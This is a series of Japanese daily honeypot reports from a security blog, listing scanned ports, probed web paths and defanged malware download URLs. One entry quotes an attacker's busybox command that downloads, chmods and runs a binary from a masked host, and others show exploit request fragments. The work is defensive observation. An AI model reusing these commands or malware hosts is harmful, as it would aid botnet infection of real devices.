2019-06-30

【ハニーポット簡易分析】Honeypot簡易分析(316日目:6/29)

Honeypot簡易分析(316日目:6/29)となります。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190630214524p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	803	-2860
23	telnet	396	-1043
2222	unreg-ab2	249	228
5900	vnc	85	-4914
20000	Unknown	73	69
23399	Unknown	44	29
3312	appman-server	44	27
3331	mcs-messaging	44	20
3372	tip2	44	22
3338	anet-b	42	18

＜新規マルウェアダウンロード＞

なし

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190630214722p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	24
/	-	-	-	18
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	2
hxxp://www[.]baidu[.]com/	Unauthorized Relay	-	-	1
www[.]baidu[.]com:443	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞

なし

＜マルウェアダウンロード＞

なし

以上となります。

2019-06-29

【ハニーポット簡易分析】Honeypot簡易分析(315日目:6/28)

Honeypot簡易分析(315日目:6/28)となります。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190629220418p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	2670	-1032
23	telnet	798	-679
5900	vnc	629	-4363
33398	Unknown	77	65
3333	dec-notes	75	47
3346	trnsprntproxy	75	50
53399	Unknown	75	60
63381	Unknown	75	63
23395	Unknown	74	62
3304	opsession-srvr	74	49

＜新規マルウェアダウンロード＞
なし

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190629220640p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/	-	-	-	28
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	25
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	7
/TP/public/index.php	ThinkPHP	-	-	3
/MyAdmin/scripts/setup.php	phpMyAdmin	-	-	1
/favicon.ico	-	-	-	1
/myadmin/scripts/setup.php	phpMyAdmin	-	-	1
/phpmyadmin	phpMyAdmin	-	-	1
/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	1
/robots.txt	-	-	-	1
hxxp://5[.]188[.]210[.]101/echo.php	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞

なし

＜マルウェアダウンロード＞
なし

以上となります。

2019-06-28

【ハニーポット簡易分析】Honeypot簡易分析(314日目:6/27)

Honeypot簡易分析(314日目:6/27)となります。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190628205554p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	3359	-326
23	telnet	1231	-249
5900	vnc	732	-4258
3306	mysql	359	135
13396	Unknown	98	89
3372	tip2	94	75
3321	vnsstr	93	75
33940	Unknown	93	82
53399	Unknown	93	82
23395	Unknown	92	84

＜新規マルウェアダウンロード＞

マルウェア	ペイロード(抜粋)
157[.]230[.]173[.]232	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

アクセスしてみると以下の文字列が表示されていました。
six runs your family

おそらく、マルウェアのダウンロード先もアクセスできる時間を短時間に設定していると思われます。通信先のレピテーション情報でブロックする運用は難しいのかもしれません。マルウェアはペイロードから推測するとCoinMiner系のマルウェアではないかと思われます。

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190628211016p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	22
/	-	-	-	20
hxxp://110.249.212.46/testget	Unauthorized Relay	-	-	4
/MyAdmin/scripts/setup.php	phpMyAdmin	-	-	1
/index.php	-	-	-	1
/myadmin/scripts/setup.php	phpMyAdmin	-	-	1
/phpmyadmin	phpMyAdmin	-	-	1
/phpmyadmin/index.php	phpMyAdmin	-	-	1
/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	1
/robots.txt	-	-	-	1

＜新規検知パス一覧＞

なし

＜マルウェアダウンロード＞
なし

以上となります。

2019-06-27

【ハニーポット簡易分析】Honeypot簡易分析(313日目:6/26)

Honeypot簡易分析(313日目:6/26)となります。
これと言った検知は特にありませんでした。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190627220908p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	4096	428
23	telnet	1370	-112
5900	vnc	1055	-3928
3424	Unknown	748	700
3335	directv-soft	132	117
3338	anet-b	131	106
3314	uohost	130	116
33902	Unknown	130	125
43389	Unknown	130	123
53397	Unknown	130	123

＜新規マルウェアダウンロード＞

マルウェア	ペイロード（抜粋）
hxxp://68[.]183[.]39[.]48/icy[.]sh	POST /UD/?9 HTTP/1.1
hxxp://185[.]99[.]254[.]29/bins/mpsl	CNXN............M.
hxxp://185[.]99[.]254[.]29/bins/x86	CNXN............M.
hxxp://185[.]99[.]254[.]29/bins/arm7	CNXN............M.

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190627222036p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/	-	-	-	31
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	24
/phpmyadmin	phpMyAdmin	-	-	1
/robots.txt	-	-	-	1
/shell	Webshell	-	-	1
/test//	WordPress	-	-	1
/test//wp-json/wp/v2/users/	WordPress	-	-	1
/test/wp-login.php	WordPress	-	-	1
/wp2//	WordPress	-	-	1
/wp2//wp-json/wp/v2/users/	WordPress	-	-	1
/wp2/wp-login.php	WordPress	-	-	1
/wp3//	WordPress	-	-	1
/wp3//wp-json/wp/v2/users/	WordPress	-	-	1
/wp3/wp-login.php	WordPress	-	-	1
hxxp://110.249.212.46/testget	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞

なし

＜マルウェアダウンロード＞
なし

以上となります。

2019-06-27

【ハニーポット簡易分析】Honeypot簡易分析(312日目:6/25)

Honeypot簡易分析(312日目:6/25)となります。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190627183336p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	4043	408
23	telnet	1640	171
3424	Unknown	959	943
5900	vnc	500	-4477
13380	Unknown	102	100
3333	dec-notes	100	74
3352	ssql	100	87
33940	Unknown	100	96
33963	Unknown	100	96
3371	Unknown	99	97

＜新規マルウェアダウンロード＞

マルウェア	ペイロード例
hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	POST /tmUnblock.cgi HTTP/1.1
lsd[.]systemten[.]org	PUT /fileserver/go.txt HTTP/1.1
178[.]62[.]114[.]122	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh	GET /shell?
103[.]83[.]157[.]41	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://185[.]244[.]25[.]241/k	CNXN............M....
hxxp:/\/185[.]244[.]25[.]241/b/arm7	GET /shell
hxxp://87[.]120[.]254[.]184/curl1	CNXN............M....
89[.]190[.]159[.]189	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190627184129p:plain

一部増加していますが、phpmyadminの調査行為を多く検知していることが原因です。
＜検知パス一覧＞

path	target	CVE	reference	count
/	-	-	-	30
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	24
/HNAP1/	D-Link DIR-850L	CVE-2015-2051	https://www.morihi-soc.net/?p=981	1
/admin/	-	-	-	1
/blog//	WordPress	-	-	1
/blog//wp-json/wp/v2/users/	WordPress	-	-	1
/blog/wp-login.php	WordPress	-	-	1
/dbadmin/	phpMyAdmin	-	-	1
/forum//	WordPress	-	-	1
/forum//wp-json/wp/v2/users/	WordPress	-	-	1
/forum/wp-login.php	WordPress	-	-	1
/main.php	-	-	-	1
/myadmin/	phpMyAdmin	-	-	1
/phpMyAdmin/	phpMyAdmin	-	-	1
/phpmyadmin	phpMyAdmin	-	-	1
/phpmyadmin/	phpMyAdmin	-	-	1
/pma/	phpMyAdmin	-	-	1
/wp//	WordPress	-	-	1
/wp//wp-json/wp/v2/users/	WordPress	-	-	1
/wp/wp-login.php	WordPress	-	-	1

＜新規検知パス一覧＞

path	target	CVE	reference
/Login.htm	-	-	-
/PMA/	PhpMyAdmin	-	-
/PMA2005/	PhpMyAdmin	-	-
/SQLite/main.php	SQLiteManager	-	-
/SQLiteManager-1.2.4/main.php	SQLiteManager	-	-
/SQLiteManager/main.php	SQLiteManager	-	-
/SQlite/main.php	SQLiteManager	-	-
/agSearch/SQlite/main.php	SQLiteManager	-	-
/hudson/script	Unknown	-	-
/mysql-admin/	PhpMyAdmin	-	-
/mysql/	PhpMyAdmin	-	-
/mysqladmin/	PhpMyAdmin	-	-
/mysqlmanager/	PhpMyAdmin	-	-
/nagiosxi/images/loginsplash.png	PhpMyAdmin	-	-
/openserver/phpmyadmin/	PhpMyAdmin	-	-
/p/m/a/	PhpMyAdmin	-	-
/php-my-admin/	PhpMyAdmin	-	-
/php-myadmin/	PhpMyAdmin	-	-
/phpMyAdmin-2.2.3/	PhpMyAdmin	-	-
/phpMyAdmin-2.2.6/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.1/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.4/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.5-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.5-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.5-rc2/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.5/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.6-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.6-rc2/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.6/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.7-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.5.7/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-alpha/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-alpha2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-beta1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-beta2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-pl3/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0-rc3/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.0/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1-pl3/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1-rc2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.2-beta1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.2-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.2-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.3-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.3-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.3/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl2/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl3/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4-pl4/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.6.4/	PhpMyAdmin	-	-
/phpMyAdmin-2.7.0-beta1/	PhpMyAdmin	-	-
/phpMyAdmin-2.7.0-pl1/	PhpMyAdmin	-	-
/phpMyAdmin-2.7.0-pl2/	PhpMyAdmin	-	-
/phpMyAdmin-2.7.0-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.7.0/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0-beta1/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0-rc2/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0.1/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0.2/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0.3/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0.4/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.0/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.1-rc1/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.1/	PhpMyAdmin	-	-
/phpMyAdmin-2.8.2/	PhpMyAdmin	-	-
/phpMyAdmin-2/	PhpMyAdmin	-	-
/phpMyAdmin2/	PhpMyAdmin	-	-
/phpmanager/	PhpMyAdmin	-	-
/phpmy-admin/	PhpMyAdmin	-	-
/phpmyadmin2/	PhpMyAdmin	-	-
/pma2005/	PhpMyAdmin	-	-
/script	-	-	-
/sqlite/main.php	SQLiteManager	-	-
/sqlitemanager/main.php	SQLiteManager	-	-
/sqlmanager/	SQLiteManager	-	-
/sqlweb/	SQL	-	-
/systemInfo	Unknown	-	-
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	SQLiteManager	-	-
/webadmin/	SQL	-	-
/webdb/	SQL	-	-
/websql/	SQL	-	-

新規ログはphpmyadminの調査行為を主に検知していました。

＜マルウェアダウンロード＞
なし

以上となります。

2019-06-25

【ハニーポット簡易分析】Honeypot簡易分析(311日目:6/24)

Honeypot簡易分析(311日目:6/24)となります。
Honeytrapは7:00以降のものが取得しているため、それ以降の分析となります。

◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

f:id:one-chick-sec:20190625211043p:plain

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
110	pop3	28972	28967
445	smb	3332	-307
23	telnet	1372	-75
3306	mysql	406	175
5900	vnc	246	-4754
3424		109	97
123	ntp	77	75
3389	rdp	71	-226
3343	ms-cluster-net	50	40
3322		47	37

＜新規マルウェアダウンロード＞

マルウェア	ペイロード例
hxxp:/\/185[.]244[.]25[.]241/b/arm7	GET /shell?cd%20/tmp;wget%20
hxxp://185[.]244[.]25[.]241/k	CNXN............
89[.]190[.]159[.]189	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	POST /tmUnblock.cgi HTTP/1.
hxxp://185[.]244[.]25[.]24/k	CNXN...........
178[.]62[.]114[.]122	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

特に新たな脆弱性による検知はなく、IoT系の脆弱性を狙ったものが多い検知でした。
実行後は該当のポートからの通信を遮断するような文字列も確認できました。他の攻撃者からの攻撃を防ぐことが目的と思われます。

BODY部例：
/bin/busybox wget -g xxx.xxx.xxx.xxx -l /tmp/vt -r /bins/element.mips;
/bin/busybox chmod 777 /tmp/vt;
/tmp/vt huawei.mips;
/bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP
◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190625211852p:plain

＜検知パス一覧＞

path	target	CVE	reference	count
/wp-login.php	WordPress	-	-	96
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	26
/	-	-	-	23
/index.php	-	-	-	2
/phpmyadmin/index.php	phpMyAdmin	-	-	2
///	-	-	-	1
///wp-json/wp/v2/users/	WordPress	-	-	1
/ipc$	IPC	-	https://thinline196.hatenablog.com/entry/2018/09/23/153019	1
hxxp://112[.]35[.]63[.]31:8088/index.php	Unauthorized Relay	-	-	1

＜新規検知パス一覧＞

path	payload	count
/site/.env	GET /site/.env HTTP/1.1.User-Agent: curl/7.35.0	1

＜マルウェアダウンロード＞
検知なし

以上となります。

2019-06-24

【ハニーポット簡易分析】Honeypot簡易分析(310日目:6/23)

HoneytrapのログがなぜかSplunkで認識されず、困ってます。ちょっと、原因が分かるまでHoneytrapの分析はお休みになるかもしれません。。。

Honeypot簡易分析(310日目:6/23)

◾️WoWHoneeypot

＜国別検知数および検知数＞

f:id:one-chick-sec:20190624070640p:plain

検知が増加していますが、Tomcatの不正認証を狙ったものとなります。ユーザ名はいつもの通りのものとなります。

認証(ユーザ名)	検知数
admin	1027
tomcat	1027
root	1026

＜検知パス一覧＞

path	target	CVE	reference	count
/manager/html	Tomcat	-	-	3081
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	25
/	-	-	-	24
/TP/public/index.php	ThinkPHP	-	-	6
hxxp://110[.]249.212.46/testget	Unauthorized Relay	-	-	2
/.well-known/security.txt	SSL certificate	-	https://qiita.com/comefigo/items/e9b1bce93c1b615e5934	1
/favicon.ico	-	-	-	1
/index.php	-	-	-	1
/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-	1
/phpmy/scripts/setup.php	phpMyAdmin	-	-	1
/phpmyadmin/index.php	phpMyAdmin	-	-	1
/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-	1
/pma/scripts/setup.php	phpMyAdmin	-	-	1
/robots.txt	-	-	-	1
/sitemap.xml	xml sitemap	-	-	1
/w00tw00t.at.blackhats.romanian.anti-sec:)	phpMyAdmin	-	-	1
/web/.env	.env file	-	-	1

＜新規検知パス一覧＞

path	payload	count
/index.html	GET /index.html HTTP/1.1.Host: default.User-Agent: curl/7.64.1	2

検知パスは特に変わったものはありませんでした。

＜マルウェアダウンロード＞
なし

以上となります。

sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(316日目:6/29)

【ハニーポット簡易分析】Honeypot簡易分析(315日目:6/28)

【ハニーポット簡易分析】Honeypot簡易分析(314日目:6/27)

【ハニーポット簡易分析】Honeypot簡易分析(313日目:6/26)

【ハニーポット簡易分析】Honeypot簡易分析(312日目:6/25)

【ハニーポット簡易分析】Honeypot簡易分析(311日目:6/24)

【ハニーポット簡易分析】Honeypot簡易分析(310日目:6/23)